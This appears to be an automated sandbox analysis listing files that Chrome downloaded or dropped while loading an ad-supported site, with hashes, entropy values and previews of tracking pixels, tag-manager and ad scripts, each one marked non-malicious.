                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pxdrop.lijit.com/a/t_.htm?ver=1.1550.828&cid=c026&cls=sync
                                                                                                                                                                                                                                                                                                                                                                          Preview:..........tV.w...."..c$.......!...x@...n.....b.P....g..,t...#......E&M..u..O.,..@..Ir.8.x..m.3C..T.....&..R.....B.....f.KN....x...%_.D..ZjQ.".&6q\...<j..\...h.)1B..}...#..,t8.^..@..k.kS..[j.-..SeY...yyp....K..^tUO.Dg....1.o.v.'.4..9Q/...<.."../!....g.*m...zk4.Df.c..&/...0....M.....".+.+\.U..Ya_../.Sq..Y^....xz.&._ .. ..<....d....!.:...1....+.....;.^../..v..W.q..$q+...@..&.<-.Lg....?.|".....z;..}zRdK.F._..T....2O.m.....8.)..:..X.]..P.(O'...............D......(.K.m`......0....mdQ.w.$W.wo.ft.R.....7..P.U.jB.Xx.....1...t..^7...7....<.U...)ov.....:..[.F.s..0.FQ..dJ.uR...E..z..[.o.@)..Pyftf>.Y........E..p..E.6..j.|y..'LTf.h..j........U...N.g.....u....H.ad.e.7....L..|-s'.....2.k.6.mjs..q}93FJ....8....W..0.....8...d........8.o...+n~C..8.H..7....{......X....#.'d^..c...y.1..G..o.......4G-#D...}.......j.X.F....Sp.@..|..."..L.F.OuoH?C......F.~.W(..5...)....c..(|.,.O..s..2E..|,.b9.....~9.+......2.1...__.qE.}{.sEdR..;.z...2...1<.rq...1.vm3.hjJ..`...p
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=105&external_user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&expiration=1760433191&C=1
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4483)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):306109
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.553015055101661
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:1+H1CEOFp7PTq0x6oI1Lirsic5e+q+qP9KjmxcQL203T2o:18OF1PKO5W8+qgjmxcQL2Jo
                                                                                                                                                                                                                                                                                                                                                                          MD5:7D44EF05FBC39BD4FF531080227E8CD1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4536E9AA4A243691522769E84BA95266C3F497B1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:98C7C9D4DBC95220B518834ABEB0DD6460344AED4C95CEB36A6A7C1728C737B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FB12B035E618FE7AE3EA38E27891C9F9CB91DA8094A8E8D02F4FE51B9A620EA26930558D23490F72388CCD69865F6EDC57B973DF4A6A6B20D47A44BE3BD9A96B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"34",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-51933500-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__f","vtp_component":"URL"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"hs-form-guid"},{"function":"__u","vtp_component":"HOST
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                          MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (13757), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13757
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.285406737717651
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:obEBqTW5Wwpk27NquCLgb2NIIYZQMc8/6SCK:ogBB5Wwpj7IuCLzNUXcUBJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:F667E53D5752EE2E5759F3DFAF20D330
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2225156FA65A34892F721DEFEA3EB480EBB32044
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CB5224674E43D02DB0037517F4AA29BA5CE9DDD0672E513CC7289714BA657522
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C7EF7AB258D8D8A1412350B828C7B3E800072A3A1800BD9D856A375ADEF850715EBDD65D0B80F07BD1203F09C1F5AFB6C00168B9379E67E6E6D5B31957712A1F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";const t="/_hcms/perf/v2",e=window,n=Math.pow(2,31);var i={mode:"compressed",staticDomainPrefix:"//static.hsappstatic.net",bender:{depVersions:{"content-cwv-embed":"static-1.1293","browserslist-config-hubspot":"static-1.114",csstype:"static-1.8","head-dlb":"static-1.1074",HeadJS:"static-2.440","hoist-non-react-statics":"static-3.9","hs-test-utils":"static-1.3276","hub-http":"static-1.2011","hub-http-janus":"static-1.493","hub-http-rxjs":"static-1.463",HubStyleTokens:"static-2.6808",jasmine:"static-4.425","jasmine-runner":"static-1.1821","metrics-js":"static-1.4705",msw:"static-1.39",quartz:"static-1.2288",react:"static-7.123","react-dom":"static-7.85","react-redux":"static-7.16",redux:"static-4.16","redux-thunk":"static-2.17",rxjs:"static-5.10",StyleGuideUI:"static-3.401","testing-library":"static-1.99","webpack-env":"static-1.4",enviro:"static-4.230","hs-promise-rejection-tracking":"static-1.903",PortalIdParser:"static-2.218",raven:"static-3.863","raven-hubspot
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):17222
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.01701680120626
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:KI718jNMTmRVJa/dDpMVx6EIaQSlcIjnJqgEjAhnQ9/e:KI71856bVDpREbyIjJijAhnQQ
                                                                                                                                                                                                                                                                                                                                                                          MD5:B29B38779EF05E03B4938932050B1911
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CEABC6176C254C5BC5F28C130338B0A4D46CC26C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A31100A18260042EE3FAC714B9939BF86C8D8B442BFA1C8AF606758475267D64
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:174BB66C9FC338A22D32D493C8A1D43488F0F2BD9D1C56011E70EB27127CC73571CF836426FF9BE9309819A10356082BC48D16E1A4E8033B003EACACE9563631
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20241009&st=env
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"sodar_query_id":"jOAMZ5jTK7eXjuwPhtTSwQE","injector_basename":"sodar2","bg_hash_basename":"-DbLkJJK3YZOSOasYi6rcjkBM_N5vpNI48728xD2bD8","bg_binary":"LlIOIiOcXeMEi53H3RPR8yJyq+lOob2zrrTo61JVLFus3E0JoQRCqGoGTUFu/TnxHSnqfrGtaFNXgQ5e7cfEONVq3ZuLbxesNxy7mnptgmeqJbHh24j63u+GAwFVcg09O863DiCCyPQCSufL5LIrCURd+94UjVDJAlS6S2PBGwjDocwfyK5KpbEfYbT30Xu4M7Vi9yAmrzAgD+41F8LbE4NWID5zxaZX/gJqQsi+XHll3hWCkrX8ze7MiSQccAhr1U+4bXxnBXrLfgVFA/t8NPg6x/Fl2TPFchE2WmYjQghv0rv+APvQ25Ux8b7bv/wkwrMCJr5Xu2nWNhrMqAj8u7FMXKHaWQ4JPwRaZnXsfK4mQxQdahuAYTOVImveWeRbPznENNuIxS4LAYvUcqq2ywUr6S0kFvaS4psn/MYsJghfp1qbS3/phd8aSZTy3W5L2RVAMJgnnRQtUkovrH0QYGdjtEKHXcDA30kf0YWUlQFnZdkn+iiGRCoIxSX9A/CRd/CiG8Ax8xzENggL6Y2Pucm2ppB6FT1zCZ+utpLYlSZX/jOk5RX+8uuQ1fTVte+cbACANxsZ0wK4TT5Mw0mu1JYw28ybITDVifSqQ2eRyE2VkJR1jEEarQRvfTpcotd1kcIyEEoxKbUW4fQp24kEJ5YL7ghc5bHeoTBNRXXJeKDKMWBB6iDPBLFplO6roBm6xLXO+scDmpmzlmEFDoUNZnhomqEP4H4z2RsiS4iJH2Tb3FZqi7FR+XGO36jMBwKmLE+OOqKDAqZ/Ah5WAcGE9OoXI0Yg9xEFB7Gk+R4C+XZDNVAC+5H2U2zUxq2oBiqk50sqr+2/Z7stPrhDR
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2868)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):430169
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5821163985782345
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:wosugg2aXn2yn2S7PPpSCSGcUJtCXUxO/3sOKw1CqpH36X5kNzhqPytvFaOrw1y7:wosugg2aXn2yn2S7PPpStGcUJtCXUxOV
                                                                                                                                                                                                                                                                                                                                                                          MD5:C99FEF5B5348B29C6617B074969BF7B9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:92EA16144E76256B6E98A62EFD1FACE152482272
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:21EE1BCEE6D8C9FCFFBFE8C70CDEF5510A0464D8AC06CED64D2180B246838A9E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2C2ED93F507DDD0816A42ACC881E14141C5DD4AC570C84D034814BA61EADE736709217ACC332DB9013D56971C170F68A5A05ECD7D1988748A620087F5B20DDAA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ia={};function ja(a,b,c){if(!c||a!=null){c=ia[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ka(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ia[d]===void 0&&(a=Math.random()*1E9>>>0,ia[d]=ea?da.Symbol(d):"$jscp$"+a+
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (53672)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):54976
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.736266810899142
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:jvaDmGd1Rq6wmiHaiTc1kC1xWKG29lMF3Px810K2LtaSG11aeBpXzbP8hP7E:jvaDmC19wmbSCjpG29KFiXLpXzB
                                                                                                                                                                                                                                                                                                                                                                          MD5:49A2FCF87A0AEC31C432E04F35AD6094
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7FAE0059C1CD8C04BE2EC7A8ECDC712730D26704
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3FFD2E0331C96FFCCB313B388D093D3E0A083AA7F6F7EF9E09EA3BD44536B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:814CB4CB5A54FCE13F4D1FB693CCE3A88ACBA1A3F867BC7F85AEB1E06175A4F78E5D4DB02C7E412F018D5DD2BE78C17B43C62523ABC0A6CD1101B568DD348E8E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/bg/P_0uAzHJb_zLMTs4jQk9PgoIOqf29--eCeo71EU2sAI.js
                                                                                                                                                                                                                                                                                                                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function l(I){return I}var M=function(I,w,d,k,X,A,B,m,u,Y,Q,S){for(Q=(Y=75,63);;)try{if(Y==k)break;else{if(Y==d)return Q=63,m;if(Y==15)Y=K.console?w:d;else if(Y==75)m=B,u=K.trustedTypes,Y=72;else if(Y==72)Y=u&&u.createPolicy?I:0;else if(Y==I)Q=68,m=u.createPolicy(A,{createHTML:J,createScript:J,createScriptURL:J}),Y=d;else if(Y==7)Q=63,Y=15;else if(Y==w)K.console[X](S.message),Y=d;else if(Y==0)return m}}catch(N){if(Q==63)throw N;Q==68&&(S=N,Y=7)}},J=function(I){return l.call(this,I)},K=this||self;(0,eval)(function(I,w){return(w=M(54,17,30,16,"error","bg",null))&&I.eval(w.createScript("1"))===1?function(d){return w.createScript(d)}:function(d){return""+d}}(K)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3048)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):50630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567339578794989
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:FLszR7bx8BAwksq5iae81/6rCXP+OHGGnF6wcnbBm0XApzlE:FLst2548CpnFfA6a
                                                                                                                                                                                                                                                                                                                                                                          MD5:720B17007468ED45EEEB0189F26E988E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EAAA0BB51885CF01D4BDEB4DA347EA42A816C638
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E12F1AAD0C4D33C880FAF28FC0CF72A04A32F235DE77F905C2D4C469A4404C61
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1D63E319632B6B4279AC3BA059DA6827F09621C5BAE4B8B07D4A61B82F090A3573E0132354ACF5E7F97EF5CC24611A7AC0EB08644E0FCCDD432189AADD691F03
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var q,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object"); .},da=ca(this),t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}; .t("Symbol",function(a){if(a)return a;var b=function(e,g){this.la=e;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.la};a=Math.random()*1E9>>>0;var c="jscomp_symbol_"+a+"_",d=0,f=func
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2572
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.788809561087102
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:xD6SlM7QADK1ikWFA43t8rFBimuzFF/pkAXjkpykWVGeTp4c+kA:tDSUAuPEA4dkFYxRR4YJTCtkA
                                                                                                                                                                                                                                                                                                                                                                          MD5:6972D427B5D8AFFE06DF6B93EE0B739E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:792864FA0F4143D8C023890296BA4CDA5D8ACCBD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:14F945044393C401A954A0FFD8F1241830495651F9A33DFF95DDD3F5B0198FCE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:570FC99C36CAB2D65A34B4B8F2609FF5AF0DCEADF9E13DF801B1EAABAB73F842CF5DF6BF8D90E27A4DCE5854C7C93A61BF32E1DD2DD772CF085842310BEEEA73
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF................................................#..#" !,#...7.,+1)4*.'/2,'<.*4&............!.".020/-0*2)'*0&.-**'2'''(.(-3(&-'*-&''&*'-&)'&&*'''......d.d...........................................6.........................!.1."AQ.#aq..2..$35Rbs..................................../.......................!1.AQ.."2q......a.#3..............?.....P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..\.z.M...t..`.*...e...{z~.&x.Tys.p..W..j:..e..i..C?...G.....tqz*.|.../?#.....y..L...TT.jV.?.....c......./....C...x....n:..g...e...N.).>.+..t..%..=.sG*n$[..,/b..f....v.Ld.g.a..........zO.:.H....."A......O.......)89...=.......P.u+.4.e..!"G..2v.,p=x..1ri....;}f....T:.`.=.=*e....N...s..P....2...|.kK^wd%v....J.`6..k/.?$..S...w.w}...5.+....OY.....?...].[`].....1])=*.<qz.Gs.t..y..*_..2o.A.)........G42.8;U.gc..,qj]....S.g.Wy-H.Z.Gv......8.......XR}._4i.7%%. hwgQ..u.......].A.....0$w.ZkN.c.K...s......Z7.qK......~......Xrc........:%..\_..rU. .]A..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://sync.sharethis.com/ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3605
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.075622390478209
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:meRNNE1uyjLGLfh1ADA6V89sOPSejl6kHN4ynxmIvx9riqYniKL/bbzmc:duxLkSs629saW/+9WqQZL/qc
                                                                                                                                                                                                                                                                                                                                                                          MD5:F16E89FD08A708A6BD2E69BE50FD30AB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:530FEF7EFD42A36908F40C87114A28C1398E1367
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:08B479C3EEB1CB4D44354E6BF17322CD7ACD38AE9A33EE5956898447ED43FAB6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:94722AF96B830015C2515BD537E8610A25B61AC7C66C990D41565CD87AB50667E8CBFAB347188E98BA7793EF5AB48F0B3115C40DE55F4791D2CD1B2321405295
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tags.crwdcntrl.net/lt/c/3825/optimus_rules.json
                                                                                                                                                                                                                                                                                                                                                                          Preview:[{"id":16472,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"twitter\"]}}","event":"click","behaviorType":"act","template":"Click On Twitter Link"},{"id":16473,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"youtube\"]}}","event":"click","behaviorType":"act","template":"Click On YouTube Link"},{"id":16474,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"hulu\"]}}","event":"click","behaviorType":"act","template":"Click On Hulu Link"},{"id":16475,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"digg.com/submit\"]}}","event":"click","behaviorType":"act","template":"Share Content On Digg"},{"id":16476,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"del.icio.us\"]}}","event":"click","behaviorType":"act","template":"Share Content On Delicious"},{"id":16477,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[href*=\"facebook\"]}}","event":"click","behaviorType":"act","template":"Click On Facebook Link"},{"id":16478,"location":"([a-zA-Z0-9_+%-]+)","element":"{{a[hre
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4926), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4926
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.820756771867915
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUK8Ko3Ek2:1DY0hf1bT47OIqWb1j8KzZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:5702B1C00B518231F70015CDFDC114F4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6F3DC59CDCE8CF2ED6C8570118E92F5DDBFD991B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9212B5FD74F751F15FBAE876E677B1F04B142CF2D1ABA7C06C0E1DC137248231
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F67B778B7C2A5088BADCFBF9A3914F4D0451AFE28B59C40A648D0F04BC21F6B9E7384BDBD93C726625155D95EDCCA60E2DCE56715C1F1441F061C95C1A872682
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
